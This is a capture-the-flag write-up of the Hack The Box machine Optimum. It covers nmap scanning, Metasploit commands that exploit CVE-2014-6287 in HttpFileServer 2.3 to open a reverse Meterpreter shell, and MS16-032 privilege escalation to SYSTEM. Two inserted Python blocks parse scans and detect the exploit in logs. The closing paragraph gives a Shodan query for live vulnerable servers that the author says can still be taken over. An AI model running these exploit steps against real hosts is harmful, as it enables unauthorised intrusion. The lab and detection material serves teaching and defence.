CVE attack

Last week I was working on the retired HTB machine Optimum. It is a cool example of simple enumeration, an attack using a vulnerability in a service (a web file server), and then privilege escalation using a local exploit for an unpatched Windows 2012 server. It is an example of a real-case scenario. Great for a presentation, especially to higher management or teams which don't give a fuck about the patching process :)


There are a lot of writeups and step-by-step instructions for this machine, so I will just give you a short introduction to what I did and what you can learn from this example.

As we already know our target, we can skip reconnaissance and go straight to enumeration/scanning.

sudo nmap -sV -A -oN optimium.txt <TARGET_IP>

-sV Probe open ports to determine service/version info.
-A Enable OS detection, version detection, script scanning, and traceroute.
-oN Output scan in normal format.

Our results are the version of the operating system (with a probability as a percentage), the open ports and the services running on them, together with the version of the running software.

Nmap reveals just one open service, which is HttpFileServer version 2.3. A bit of searching reveals that this particular version has a remote command execution vulnerability (CVE-2014-6287).

Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
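As an added example (not part of the original post), a small Python parser for the nmap -oN report described above that tags an HFS banner falling in the "2.3x before 2.3c" range with CVE-2014-6287; the scan text is a constructed sample in nmap's normal-output layout, not a real capture, and <TARGET_IP> is a placeholder:

```python
import re
from typing import Dict, List

# One service line of nmap -oN output, e.g. "80/tcp open  http    HttpFileServer httpd 2.3"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Rejetto HFS banner as nmap prints it; captures "2.3" plus an optional patch letter
HFS_RE = re.compile(r"HttpFileServer httpd (\d+\.\d+)([a-z]?)", re.IGNORECASE)


def hfs_vulnerable(version: str) -> bool:
    """CVE-2014-6287 affects HFS 2.3x before 2.3c, i.e. 2.3, 2.3a and 2.3b.
    Versions outside the 2.3 branch are not covered by this check."""
    m = re.fullmatch(r"(\d+)\.(\d+)([a-z]?)", version)
    if not m or (int(m.group(1)), int(m.group(2))) != (2, 3):
        return False
    return m.group(3) < "c"  # "" < "a" < "b" < "c" in string order


def parse_nmap_normal(text: str) -> List[Dict]:
    """Return open ports from an -oN report, tagging HFS versions hit by CVE-2014-6287."""
    findings = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if not m or m.group(3) != "open":
            continue
        port, proto, _state, service, version = m.groups()
        entry = {"port": int(port), "proto": proto, "service": service,
                 "version": version.strip(), "cves": []}
        h = HFS_RE.search(version)
        if h and hfs_vulnerable(h.group(1) + h.group(2)):
            entry["cves"].append("CVE-2014-6287")
        findings.append(entry)
    return findings


# Constructed sample in nmap -oN layout (not a real capture), mirroring what the
# scan above reports for Optimum.
SAMPLE_SCAN = """\
# Nmap scan initiated as: nmap -sV -A -oN optimium.txt <TARGET_IP>
Nmap scan report for <TARGET_IP>
Host is up (0.045s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

if __name__ == "__main__":
    for finding in parse_nmap_normal(SAMPLE_SCAN):
        print(finding)
```

The same parser can be pointed at any -oN file; only the HFS banner check is CVE-specific.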

Cool. As we know this is port 80 and a file server service, we can put the IP address into the web browser. We will see the web interface of HttpFileServer with the version information, the same as we found using Nmap.

This vulnerability was discovered in 2014; the official Metasploit module was added in 2018. If you Google the phrase CVE-2014-6287 exploit you will see results from Exploit-DB, but a few results below you can find results from Rapid7 (the owner of Metasploit). This page will literally show you how to choose and use the module to exploit this vulnerability.
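From the defender's side, the same %00-in-search trigger named in the CVE text is what you would hunt for in the web server's access log. This is an added example, not code from the original post; the log lines are constructed samples in common log format, and the double-encoded %2500 variant is included as an assumption about how an attacker might try to slip past a naive filter:

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Common-log-format access line: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_nullbyte_search(target: str) -> bool:
    """True when the request's search parameter carries a NUL byte, the
    CVE-2014-6287 trigger. parse_qsl decodes %00 to \\x00; a double-encoded
    %2500 decodes to the literal text %00 and is flagged as well."""
    query = urlsplit(target).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() != "search":
            continue
        if "\x00" in value or "%00" in value.lower():
            return True
    return False


def detect_hfs_exploit_attempts(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (source, timestamp, request target) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_nullbyte_search(m.group("target")):
            hits.append((m.group("src"), m.group("ts"), m.group("target")))
    return hits


# Constructed sample log lines (not a real capture): two normal requests,
# one literal %00 search and one double-encoded variant.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 1337
10.0.0.5 - - [01/Jan/2021:10:00:02 +0000] "GET /?search=report HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /?search=%00xyz HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2021:10:00:04 +0000] "GET /?search=%2500abc HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for src, ts, target in detect_hfs_exploit_attempts(SAMPLE_LOG):
        print(f"{ts} {src} -> {target}")
```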

So yeah, let's go to msfconsole and run a few commands.

use exploit/windows/http/rejetto_hfs_exec
show options
set lhost <YOUR IP>
set rhosts <TARGET_IP>
exploit

After it completes, the magic is done and a new, default Meterpreter session is opened. What does this mean for you? You are on the target machine. Check a few things.

What system you are on:

sysinfo

Where you are:

pwd

And who you are:

getuid

What you see:

dir

You can see you are on a Windows 2012 Server x64 machine (the same info you had from the Nmap scan). You are located in the user's directory (you have the same privileges as the user who is running the HFS service; this is why it is worth running server apps as users dedicated to a specific application or service, like Nginx running as the www-data user on Linux, etc.).

BTW, to get the user flag in HTB you need to check the user.txt file on the standard user's desktop. The flag is inside the file. For the root flag you need to get access to the Administrator's desktop, where there is a file called root.txt with the flag.

At the moment we have access to the Windows 2012 server as a standard user, so we have access to all data belonging to that user. Now we need to try to escalate our privileges to get greater access. It would be cool to get Admin access to that server, right? If we do that, it means we are the new server owner :)

In the meantime, if you are new to Metasploit and Meterpreter, check how to use them, how to move between sessions and how to use the basic commands. This link will be useful to you.

If you run the command ps you will see a list of running processes. Guess which one is our payload? The default reverse_tcp shell is 32-bit (x86) and looks suspicious (we used the default one as this is just a CTF exercise). Migrate it to an x64 process to be able to run other exploits. In the process list search for explorer.exe or any other process which is running as x64, and remember its PID.

migrate <PID>

Check the process list again and review the results; also run sysinfo to confirm that the Meterpreter session is now the x64 version. We are ready for the next step. Put the Meterpreter session into the background.

background

Now we try to find some local exploit for Windows Server 2012. If the server is not patched and up to date there is quite a big chance to escalate privileges. You can search for an exploit in Google again; just type Windows 2012 privilege escalation and review the results. Similar to the previous exploit, there are results from Exploit-DB and Rapid7. You can also search for local exploits in Metasploit.

search exploit/windows/local

Review their descriptions and try, one by one, the ones which you think can work. You can also try to automate this by running the Local Exploit Suggester. To check which session your Meterpreter is running in, just type sessions in Metasploit; you will see the list of active sessions.

search suggester
use post/multi/recon/local_exploit_suggester
show info
set session 1
run

As the name of the module suggests, the module will suggest possible solutions ;) But it doesn't work very well; in many cases I never hit anything good. No worries at all, remember? You already did research in Google. MS16-032 is the one you should use for HTB.

Again, play with Metasploit.

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
show info
show targets
set target 1
set LHOST <YOUR IP>
exploit

If the server is vulnerable (and in this case it is) you have a new Meterpreter session. Look around using the same set of commands: sysinfo, pwd, getuid, dir. Yes, you have access to the SYSTEM account. Easy peasy.

What did you learn?

  • Enumerating ports and services
  • Identifying vulnerable services
  • Identifying known exploits
  • Basic Windows privilege escalation techniques

and most important

  • never ever complain about system/software updates, and apply them as fast as possible.

To be honest, this example was created to show you something more. It doesn't matter if it's a server, a computer at home or a router on the local network. Each unpatched application or system makes it easy to take over. And now for the best part: the vulnerability in HFS was detected on 09/11/2014, the privilege escalation in Windows 7-10 and 2k8-2k12 (32 and 64 bit) was detected on 03/21/2016; everything is pretty old, right?

Now go to Shodan. Make a quick search, ekhm, let's say this one: product:"HttpFileServer" version:"2.3" -version:"2.3 beta". Check a few results. Do you believe what you see? I do. It's 2021 and there are still unpatched servers you can take over using the method described above. Now consider how many other unpatched vulnerabilities you can find and carry out a similar attack with. The answer is… too many :)